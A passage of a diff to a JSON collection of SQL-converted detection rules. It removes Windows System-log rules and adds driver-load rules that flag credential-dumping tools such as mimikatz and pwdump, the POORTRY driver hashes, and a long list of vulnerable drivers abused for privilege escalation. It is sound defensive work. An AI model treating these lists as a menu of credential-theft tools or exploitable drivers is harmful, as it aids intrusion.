'%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" ], - "filename": "win_system_rdp_potential_cve_2019_0708.yml" + "filename": "driver_load_win_mal_poortry_driver.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", - "status": "experimental", + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", "description": "Detects well-known credential dumping tools execution via service execution events", "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ @@ -3821,351 +3745,231 @@ "falsepositives": [ "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" - ], - "filename": "win_system_mal_creddumper.yml" - }, - { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" - ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" - }, - { - "title": "Anydesk Remote Access Software Service Installation", - "id": "530a6faa-ff3d-4022-b315-50828e77eef5", - "status": "experimental", - "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" - ], - "falsepositives": [ - "Legitimate usage of the anydesk tool" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" - ], - "filename": "win_system_service_install_anydesk.yml" - }, - { - "title": "Remote Access Tool Services Have Been Installed - System", - "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", - "status": "experimental", - "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali", - "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1569.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" ], - "filename": "win_system_service_install_remote_access_software.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "New PDQDeploy Service - Server Side", - "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "title": "Vulnerable Driver Load By Name", + "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", "status": "experimental", - "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "description": "Detects the load of known vulnerable drivers via their names only.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ - "Legitimate use of the tool" + "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\mtcbsv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gameink.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\81.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sense5ext.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gvcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lurker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\enetechio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows8-10-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\corsairllaccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winflash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\paniox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blackbonedrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutildrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\my.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ni.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2cio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\protects.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netproxydriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64\\_w10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsmartconnectdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdryzenmasterdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmix64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nchgbios2x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrsh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lha.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blacklotus\\_driver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ucorew64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows7-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\otipcibus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows-xp-64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswarpot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdpowerprofiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tgsafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrrapidstartdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lv561av.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asribdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eneio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\80.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iobitunlocker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstrwsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wiseunlo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hostnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\glckio2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hpportiox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_amd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kevp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmixp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nbiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\full.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtcore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwrwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hw\\_sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bandai.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t8.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adv64drv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsetupdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gametersafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lenovodiagnosticsdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bw.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nodedriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\naldrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winiodrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pciecubed.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpupress.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswvmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tmcomm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmi.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\alsysio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\testbone.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\air\\_system10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcpu.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kbdcap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lctka.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phlashnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndislan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonfltx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\black.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mydrivers.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\openlibsys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vproeventmonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE 